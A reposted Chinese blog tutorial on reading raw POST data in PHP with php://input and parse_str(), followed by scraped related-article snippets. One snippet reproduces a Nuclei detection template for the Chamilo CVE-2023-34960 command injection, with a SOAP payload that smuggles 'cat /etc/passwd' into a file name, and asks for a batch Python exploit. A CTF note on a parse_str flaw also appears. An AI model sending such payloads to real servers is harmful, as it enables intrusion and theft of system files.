php://input和parse_str()使用

最新推荐文章于 2024-11-20 00:58:36 发布
最新推荐文章于 2024-11-20 00:58:36 发布
阅读量150 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: php
原文链接:http://www.cnblogs.com/jiaoaozuoziji/p/9198738.html

php://input可以读取没有处理过的POST数据,总结起来就是,

在用$_POST获取不到由APP或者一些接口的回调数据时,就用php://input试试

实例

index.php

<form action="test.php" method="post">   
    <input type="text" name="username">   
    <input type="password" name="password">   
    <input type="submit">   
</form>

test.php
<?php
    header("Content-Type:text/html;charset=utf-8");
    $file_in = file_get_contents("php://input"); 
    echo $file_in;
    echo "<br>";
    echo urldecode($file_in);

 

结果 

username=张三$password=123456

username=张三$password=123456

 

<?php
parse_str($file_in,$myArray);
print_r($myArray);
?>

 

结果

Array ( [username] => 张三[password] => 123456)

 

转载于:https://www.cnblogs.com/jiaoaozuoziji/p/9198738.html

【红日Day7-CTF】parse_str函数缺陷漏洞
PZ的博客
01-13 1939
练习记录 复现代码: index.php <?php $a = "hongri"; $id = $_GET['id']; @parse_str($id); if ($a[0] != 'QNKCDZO' && md5($a[0]) == md5('QNKCDZO')) { echo '<a href="flag.php">flag is here</a...
file_get_contents("php://input")的使用方法
热门推荐
中国石油大学 INThe Du Jin Feng
07-04 2万+
$data = file_get_contents("php://input");     php://input 是个可以访问请求的原始数据的只读流。 POST 请求的情况下,最好使用 php://input 来代替 $HTTP_RAW_POST_DATA,因为它不依赖于特定的 php.ini 指令。 而且,这样的情况下 $HTTP_RAW_POST_DATA 默认没有填充, 比激活 alwa
input
weixin_30470643的博客
09-16 195
H5新增input的属性   <input type="number" min="2" max="10" step="2"/> 上下加减   <input type="range" min="2" max="10" step="2"/> 进度条   <input type="search"/> text可以点删除   <input...
php://input
weixin_34246551的博客
07-12 103
为什么80%的码农都做不了架构师?>>> ...
phpphp://input
Afar的专栏
01-22 1446
转自:http://www.nowamagic.net/academy/detail/12220520 相关资料:http://php.net/manual/zh/wrappers.php.php 1.php://input 1.1.file_get_contents('php://input', 'r');  php://input可以读取没有处理过的POST数据。相较于$HTT
php//input),PHP 输入流 php://input使用说明(1/2)_PHP教程
weixin_39846191的博客
03-13 355
使用xml-rpc的时候,server端获取client数据,主要是通过php输入流input,而不是$_POST数组。所以,这里主要探讨php输入流php://input对一php://input介绍,PHP官方手册文档有一段话对它进行了很明确地概述。“php://input allows you to read raw POST data. It is a less memory inten...
php 记录php://input
01-06
parse_str(file_get_contents('php://input'), $_DELETE); break; } ``` 以上代码段根据不同请求方法设置了相应的全局变量$_PUT 或者 $_DELETE 来模拟类似$_POST 的行为模式,方便开发者进一步开发API接口等功能...
我是用php中的file_get_contents("php://input")取不到值
05-21
`file_get_contents("php://input")` 可以用于获取 HTTP 请求...parse_str($form_data, $data); ``` 需要注意的是,`file_get_contents("php://input")` 只能获取 POST 请求的数据,如果是 GET 请求则无法获取到数据。
phpparse_str($a,$b)
最新发布
05-11
比如,当使用单个参数时,parse_str('name=John&age=30')会创建变量$name$age,这可能带来安全风险,尤其是在处理用户输入时。而使用双参数时,结果存储在数组中,更为安全。 还需要提到注意事项,比如参数顺序、...
id: CVE-2023-34960 info: name: Chamilo Command Injection author: DhiyaneshDK severity: critical description: | A command injection vulnerability in the wsConvertPpt component of Chamilo v1.11.* up to v1.11.18 allows attackers to execute arbitrary commands via a SOAP API call with a crafted PowerPoint name. impact: | Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire system. remediation: | Apply the latest security patches or updates provided by the vendor to fix the command injection vulnerability in Chamilo LMS. reference: - https://sploitus.com/exploit?id=FD666992-20E1-5D83-BA13-67ED38E1B83D - https://github.com/Aituglo/CVE-2023-34960/blob/master/poc.py - http://chamilo.com - http://packetstormsecurity.com/files/174314/Chamilo-1.11.18-Command-Injection.html - https://support.chamilo.org/projects/1/wiki/Security_issues#Issue-112-2023-04-20-Critical-impact-High-risk-Remote-Code-Execution classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-34960 cwe-id: CWE-77 epss-score: 0.93314 epss-percentile: 0.99067 cpe: cpe:2.3:a:chamilo:chamilo:*:*:*:*:*:*:*:* metadata: verified: "true" max-request: 1 vendor: chamilo product: chamilo shodan-query: - http.component:"Chamilo" - http.component:"chamilo" - cpe:"cpe:2.3:a:chamilo:chamilo" tags: cve,cve2023,packetstorm,chamilo http: - raw: - | POST /main/webservices/additional_webservices.php HTTP/1.1 Host: {{Hostname}} Content-Type: text/xml; charset=utf-8 <?xml version="1.0" encoding="UTF-8"?> <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns1="{{RootURL}}" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ns2="http://xml.apache.org/xml-soap" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><ns1:wsConvertPpt><param0 xsi:type="ns2:Map"><item><key xsi:type="xsd:string">file_data</key><value xsi:type="xsd:string"></value></item><item><key xsi:type="xsd:string">file_name</key><value xsi:type="xsd:string">`{}`.pptx'|" |cat /etc/passwd||a #</value></item><item><key xsi:type="xsd:string">service_ppt2lp_size</key><value xsi:type="xsd:string">720x540</value></item></param0></ns1:wsConvertPpt></SOAP-ENV:Body></SOAP-ENV:Envelope> matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" part: body - type: word part: header words: - text/xml - type: status status: - 200 # digest: 4a0a00473045022034e60ad33e2160ec78cbef2c6c410b14dabd6c3ca8518c21571e310453a24e25022100927e4973b55f38f2cc8ceca640925b7066d4325032b04fb0eca080984080a1d0:922c64590222798bb761d5b6d8e72950根据poc实现python的exp,并且读取当前目录下的文件 批量执行 ,例如,python CVE-2023-34960.py -f .8.txt -c "需要执行的命令" 并将执行成功的结果输出 -o 9.txt 添加选项-o 8.txt的文本文件
03-27
这需要解析用户输入的目标URL,使用Python的urllib.parse模块来分解重组URL。例如: from urllib.parse import urlparse, urlunparse target = "http://example.com:8080/chamilo" parsed = urlparse(target) # ...
php://input 如何用?
weixin_30797027的博客
03-26 246
$content = file_get_contents("php://input"); kint($content);--读取Post过来的数据 转载于:https://www.cnblogs.com/qinqiu/p/8651323.html
谈一谈php://inputphp://output
qq_14989227的博客
03-10 986
对一php://input介绍,PHP官方手册文档有一段话对它进行了很明确地概述。 php://input 是个可以访问请求的原始数据的只读流。 POST 请求的情况下,最好使用 php://input 来代替 $HTTP_RAW_POST_DATA(原生的post数据),因为它不依赖于特定的 php.ini 指令,内存消耗更少“php://input allows you to read raw...
post php://input
weixin_30432179的博客
08-21 349
$_POST['paramName']获取通过表单(multipart/form-data)提交的数据。但有时客户端会直接将请求数据以字符串的形式都放到body里传递过来,那么服务端就需要使用php://input方式来接收数据。 1,php://input 介绍 (1)php://input是个可以访问请求的原始数据的只读流。 (2)php://input与$_...
Python3 —— if/while/input
血染风采2019
09-09 567
                            Python3 —— if/while/input   目录           Python3 —— if/while/input 1.条件测试 2.if语句 3.input()函数 4.while循环 5.break与continue 1.条件测试 ==   等于 !=   不等于 &lt;    小于 &lt;...
PHPphp://input到底是干什么的?为什么需要它?使用场景是什么?底层原理是什么?
长风破浪会有时的博客
11-20 545
PHP 中的一个内置流,用于读取原始的 HTTP 请求体的内容。它在处理非表单数据、文件上传、Webhooks API 接口等场景中非常有用。通过,你可以方便地读取客户端发送来的任何格式的数据,并对其进行处理。在使用时需要注意只能读取一次,并且要确保数据的安全性。
file_get_contents("php://input")
axfcjwkbi259888707的博客
08-09 290
$data = file_get_contents("php://input"); php://input 是个可以访问请求的原始数据的只读流。 POST 请求的情况下,最好使用 php://input 来代替 $HTTP_RAW_POST_DATA,因为它不依赖于特定的 php.ini 指令。 而且,这样的情况下 $HTTP_RAW_POST_DATA 默认没有填充, 比激活...
file_get_contents("php://input")的用法
weixin_30951743的博客
10-19 125
 $data=file_get_contents("php://input");   php://input 是个可以访问请求的原始数据的只读流。 POST 请求的情况下,最好使用 php://input 来代替 $HTTP_RAW_POST_DATA,因为它不依赖于特定的 php.ini 指令。 而且,这样的情况下 $HTTP_RAW_POST_DATA 默认没有填充, 比激活 alwa...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值